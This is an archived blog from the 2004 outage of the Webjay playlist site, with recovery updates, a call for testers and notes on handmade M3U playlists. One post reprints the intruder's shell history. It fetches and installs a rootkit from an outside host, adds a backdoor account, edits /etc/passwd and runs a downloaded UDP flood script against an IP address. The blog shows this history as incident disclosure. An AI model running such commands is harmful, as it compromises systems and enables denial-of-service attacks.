Tuesday, December 07, 2004
Afterlife of this blog
You are reading a defunct weblog. This weblog was created to stand in for the Webjay.org web site when it was totalled by a cracker. During that time the webjay.org domain forwarded to here, where users could get news about progress towards reopening the site.
But no longer.
If you are reading this, you must not have gone through the forwarding address. In that case, there is no here here.
But no longer.
If you are reading this, you must not have gone through the forwarding address. In that case, there is no here here.
Monday, December 06, 2004
BACK FROM THE DEAD -jay
We're flipping the switch to put Webjay back online. It will take about a half day for the change to reach every ISP, so if you see this page instead of webjay.org, stop back in a little while.
In the meantime, let's celebrate:
Friday, December 03, 2004
Re-opening Monday
The code is good to go, so the next thing is a couple days worth of security work.
Grand re-opening date: Monday.
Grand re-opening date: Monday.
Starfrosch playlist
Markus Koller's hand-made M3U (hosted on gonze.com/playlists per my offer the other day) is rocking my apartment block. Markus, my neighbors are cursing you as I write this.
Doing it by hand is primitive but fun. Any more?
Update #1: Brett, aka webjaybs, posted more handmade playlists here:
Update #2: Actually, there's no need to email me the list of song URLs. Just post them in a comment and I'll make an M3U.
Doing it by hand is primitive but fun. Any more?
Update #1: Brett, aka webjaybs, posted more handmade playlists here:
- http://brettsinger.net/projects/blog/temp/playlists/
- http://www.brettsinger.net/projects/playlists/olderplaylists.html
Update #2: Actually, there's no need to email me the list of song URLs. Just post them in a comment and I'll make an M3U.
Thursday, December 02, 2004
Testers wanted
Almost everything is now running, and the bugs are getting smaller and smaller, so it's time to bring in more eyeballs. There are two criteria for people who want to do testing:
1) You have to be technical enough to convince your machine that webjay.org is on the IP address I will give you. On a Unix box this means editing /etc/hosts, on a Mac it means using NetInfo, on a Windows machine it means something I don't know.
2) You have to be known to me already, since the new layer of security isn't ready yet.
Send an email to lucas@gonze.com. (webjay.org email isn't up yet.)
1) You have to be technical enough to convince your machine that webjay.org is on the IP address I will give you. On a Unix box this means editing /etc/hosts, on a Mac it means using NetInfo, on a Windows machine it means something I don't know.
2) You have to be known to me already, since the new layer of security isn't ready yet.
Send an email to lucas@gonze.com. (webjay.org email isn't up yet.)
Kewl
Wednesday, December 01, 2004
Rosie the 'lister says...
Courtesy P. Harper: 
Lemme tell you, I'm cursing like a sailor while I work on the rebuild. Anyway, if you're really jonesing there is a thing you can do. Back before webjay bootstrapped, Brett, Jim and myself were making playlists manually. What you do is make a file entitled playlistname.m3u with a bunch of URLs of songs in it, then put the file in a directory which is set up with the right mime types. gonze.com/playlists was set up for this, and it still is, so if you email me a .m3u file I'll copy it over there and post a pointer here.
For historical interest, the first really good playlist was Work, which you can still see (and maybe even listen to).
Lemme tell you, I'm cursing like a sailor while I work on the rebuild. Anyway, if you're really jonesing there is a thing you can do. Back before webjay bootstrapped, Brett, Jim and myself were making playlists manually. What you do is make a file entitled playlistname.m3u with a bunch of URLs of songs in it, then put the file in a directory which is set up with the right mime types. gonze.com/playlists was set up for this, and it still is, so if you email me a .m3u file I'll copy it over there and post a pointer here.
For historical interest, the first really good playlist was Work, which you can still see (and maybe even listen to).
Knock knock
Our friend from Brazil came knocking again. In the log of denied IP
addresses we have these:
What a creepy experience. It's like hearing noises in the night and
knowing for a fact that it's a burglar.
addresses we have these:
200.175.27.55.dialup.gvt.net.br
201-1-138-30.dsl.telesp.net.br
What a creepy experience. It's like hearing noises in the night and
knowing for a fact that it's a burglar.
Tuesday, November 30, 2004
Status November 30
The last backed-up version is now running on the new server and I'm in the process of merging in the freshest data and code. All together, the new version is up but in a very buggy state.
Monday, November 29, 2004
Cracker footsteps
Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.
Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages
Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
Prognosis
The database looks fine, so playlists and user accounts should be in good shape.
There are two backups of the code, a fairly old one which holds everything and a fresh one which holds only a few critical modules. These two different snapshots will have to be knitted together, which means that bugs will crop up during the first 1-2 days back up. Also, bugs fixed in the older backup will have to be refound and refixed.
My guess for how long the work will take is a few days at the least, a week at the most.
There are two backups of the code, a fairly old one which holds everything and a fresh one which holds only a few critical modules. These two different snapshots will have to be knitted together, which means that bugs will crop up during the first 1-2 days back up. Also, bugs fixed in the older backup will have to be refound and refixed.
My guess for how long the work will take is a few days at the least, a week at the most.
